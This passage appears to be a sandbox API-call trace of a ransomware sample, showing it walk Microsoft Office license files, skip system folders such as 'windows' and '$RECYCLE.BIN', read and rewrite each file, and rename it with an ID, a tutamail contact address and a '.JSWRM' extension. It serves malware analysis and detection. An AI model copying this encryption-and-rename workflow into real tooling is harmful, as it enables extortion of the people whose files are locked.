MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0111.623] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0111.623] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0111.623] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0111.623] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a300 [0111.623] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a300, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0111.623] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a300 | out: hHeap=0x1e0000) returned 1 [0111.623] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0111.623] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e8b8 [0111.623] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0111.623] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0111.623] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProR_Retail-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiopror_retail-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProR_Retail-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiopror_retail-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0111.624] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e8b8 | out: hHeap=0x1e0000) returned 1 [0111.624] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0111.624] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0111.624] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0111.624] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0111.624] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xec04fc30, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xec04fc30, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xec10e7fa, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5176, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="VisioProR_Retail-ppd.xrm-ms", cAlternateFileName="VIA6E5~1.XRM")) returned 1 [0111.624] lstrcmpiW (lpString1="VisioProR_Retail-ppd.xrm-ms", lpString2=".") returned 1 [0111.624] lstrcmpiW (lpString1="VisioProR_Retail-ppd.xrm-ms", lpString2="..") returned 1 [0111.624] lstrcmpiW (lpString1="VisioProR_Retail-ppd.xrm-ms", lpString2="...") returned 1 [0111.624] lstrcmpiW (lpString1="VisioProR_Retail-ppd.xrm-ms", lpString2="windows") returned -1 [0111.624] lstrcmpiW (lpString1="VisioProR_Retail-ppd.xrm-ms", lpString2="recovery") returned 1 [0111.624] lstrcmpiW (lpString1="VisioProR_Retail-ppd.xrm-ms", lpString2="perflogs") returned 1 [0111.624] lstrcmpiW (lpString1="VisioProR_Retail-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0111.624] lstrcmpiW (lpString1="VisioProR_Retail-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0111.624] lstrcmpiW (lpString1="VisioProR_Retail-ppd.xrm-ms", lpString2="system volume information") returned 1 [0111.624] lstrcmpiW (lpString1="VisioProR_Retail-ppd.xrm-ms", lpString2="msocache") returned 1 [0111.624] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0111.624] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProR_Retail-ppd.xrm-ms", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0111.624] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0111.624] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProR_Retail-ppd.xrm-ms", cchWideChar=27, lpMultiByteStr=0x241308, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioProR_Retail-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 27 [0111.624] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0111.624] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0111.624] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProR_Retail-ppd.xrm-ms", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0111.624] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0111.624] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProR_Retail-ppd.xrm-ms", cchWideChar=27, lpMultiByteStr=0x241128, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioProR_Retail-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 27 [0111.624] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0111.625] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0111.625] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0111.625] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0111.625] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0111.625] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0111.625] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProR_Retail-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiopror_retail-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0111.625] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=20854) returned 1 [0111.625] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0111.625] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5170) returned 0x24c1d0 [0111.625] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x5170, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x5170, lpOverlapped=0x0) returned 1 [0111.632] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0111.632] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x5170, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x5170, lpOverlapped=0x0) returned 1 [0111.632] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0111.632] CloseHandle (hObject=0x45c) returned 1 [0111.632] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cea0 [0111.632] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0111.632] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0111.632] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0111.632] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0111.632] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0111.632] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0111.632] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a420 [0111.632] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a420, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0111.632] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a420 | out: hHeap=0x1e0000) returned 1 [0111.632] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236970 [0111.632] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e458 [0111.632] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236970 | out: hHeap=0x1e0000) returned 1 [0111.632] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0111.632] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProR_Retail-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiopror_retail-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProR_Retail-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiopror_retail-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0111.634] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e458 | out: hHeap=0x1e0000) returned 1 [0111.634] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cea0 | out: hHeap=0x1e0000) returned 1 [0111.634] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0111.634] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0111.634] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0111.634] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xec134a58, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xec134a58, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xec1cd3ba, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d42, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="VisioProR_Retail-ul-oob.xrm-ms", cAlternateFileName="VIB61A~1.XRM")) returned 1 [0111.634] lstrcmpiW (lpString1="VisioProR_Retail-ul-oob.xrm-ms", lpString2=".") returned 1 [0111.634] lstrcmpiW (lpString1="VisioProR_Retail-ul-oob.xrm-ms", lpString2="..") returned 1 [0111.634] lstrcmpiW (lpString1="VisioProR_Retail-ul-oob.xrm-ms", lpString2="...") returned 1 [0111.634] lstrcmpiW (lpString1="VisioProR_Retail-ul-oob.xrm-ms", lpString2="windows") returned -1 [0111.634] lstrcmpiW (lpString1="VisioProR_Retail-ul-oob.xrm-ms", lpString2="recovery") returned 1 [0111.634] lstrcmpiW (lpString1="VisioProR_Retail-ul-oob.xrm-ms", lpString2="perflogs") returned 1 [0111.634] lstrcmpiW (lpString1="VisioProR_Retail-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0111.634] lstrcmpiW (lpString1="VisioProR_Retail-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0111.634] lstrcmpiW (lpString1="VisioProR_Retail-ul-oob.xrm-ms", lpString2="system volume information") returned 1 [0111.634] lstrcmpiW (lpString1="VisioProR_Retail-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0111.634] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0111.634] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProR_Retail-ul-oob.xrm-ms", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0111.634] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0111.634] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProR_Retail-ul-oob.xrm-ms", cchWideChar=30, lpMultiByteStr=0x240f48, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioProR_Retail-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 30 [0111.634] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0111.634] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0111.634] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProR_Retail-ul-oob.xrm-ms", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0111.634] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0111.634] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProR_Retail-ul-oob.xrm-ms", cchWideChar=30, lpMultiByteStr=0x2410d8, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioProR_Retail-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 30 [0111.634] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0111.634] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235bc8 [0111.634] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0111.634] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0111.634] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0111.635] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0111.635] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProR_Retail-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiopror_retail-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0111.635] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11586) returned 1 [0111.635] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0111.635] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d40) returned 0x24c1d0 [0111.635] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d40, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d40, lpOverlapped=0x0) returned 1 [0111.643] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0111.643] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d40, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d40, lpOverlapped=0x0) returned 1 [0111.643] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0111.643] CloseHandle (hObject=0x45c) returned 1 [0111.643] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235df0 [0111.643] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0111.643] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0111.643] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0111.643] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0111.643] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0111.644] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0111.644] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3a8 [0111.644] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3a8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0111.644] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3a8 | out: hHeap=0x1e0000) returned 1 [0111.644] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0111.644] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e110 [0111.644] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0111.644] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0111.644] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProR_Retail-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiopror_retail-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProR_Retail-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiopror_retail-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0111.645] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e110 | out: hHeap=0x1e0000) returned 1 [0111.645] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235df0 | out: hHeap=0x1e0000) returned 1 [0111.645] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0111.645] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0111.645] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0111.645] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xec0c233c, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xec0c233c, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xec180f00, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4ddb, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="VisioProR_Retail-ul-phn.xrm-ms", cAlternateFileName="VI0505~1.XRM")) returned 1 [0111.645] lstrcmpiW (lpString1="VisioProR_Retail-ul-phn.xrm-ms", lpString2=".") returned 1 [0111.645] lstrcmpiW (lpString1="VisioProR_Retail-ul-phn.xrm-ms", lpString2="..") returned 1 [0111.645] lstrcmpiW (lpString1="VisioProR_Retail-ul-phn.xrm-ms", lpString2="...") returned 1 [0111.645] lstrcmpiW (lpString1="VisioProR_Retail-ul-phn.xrm-ms", lpString2="windows") returned -1 [0111.645] lstrcmpiW (lpString1="VisioProR_Retail-ul-phn.xrm-ms", lpString2="recovery") returned 1 [0111.645] lstrcmpiW (lpString1="VisioProR_Retail-ul-phn.xrm-ms", lpString2="perflogs") returned 1 [0111.645] lstrcmpiW (lpString1="VisioProR_Retail-ul-phn.xrm-ms", lpString2="documents and settings") returned 1 [0111.645] lstrcmpiW (lpString1="VisioProR_Retail-ul-phn.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0111.645] lstrcmpiW (lpString1="VisioProR_Retail-ul-phn.xrm-ms", lpString2="system volume information") returned 1 [0111.645] lstrcmpiW (lpString1="VisioProR_Retail-ul-phn.xrm-ms", lpString2="msocache") returned 1 [0111.645] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d698 [0111.645] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProR_Retail-ul-phn.xrm-ms", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0111.645] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0111.645] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProR_Retail-ul-phn.xrm-ms", cchWideChar=30, lpMultiByteStr=0x2413a8, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioProR_Retail-ul-phn.xrm-ms", lpUsedDefaultChar=0x0) returned 30 [0111.645] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0111.645] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d728 [0111.645] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProR_Retail-ul-phn.xrm-ms", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0111.645] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0111.645] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProR_Retail-ul-phn.xrm-ms", cchWideChar=30, lpMultiByteStr=0x241268, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioProR_Retail-ul-phn.xrm-ms", lpUsedDefaultChar=0x0) returned 30 [0111.645] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d728 | out: hHeap=0x1e0000) returned 1 [0111.645] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236018 [0111.645] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235bc8 | out: hHeap=0x1e0000) returned 1 [0111.646] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0111.646] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0111.646] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235ea8 [0111.646] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProR_Retail-ul-phn.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiopror_retail-ul-phn.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0111.646] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=19931) returned 1 [0111.646] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0111.646] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4dd0) returned 0x24c1d0 [0111.646] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x4dd0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x4dd0, lpOverlapped=0x0) returned 1 [0111.649] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0111.649] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x4dd0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x4dd0, 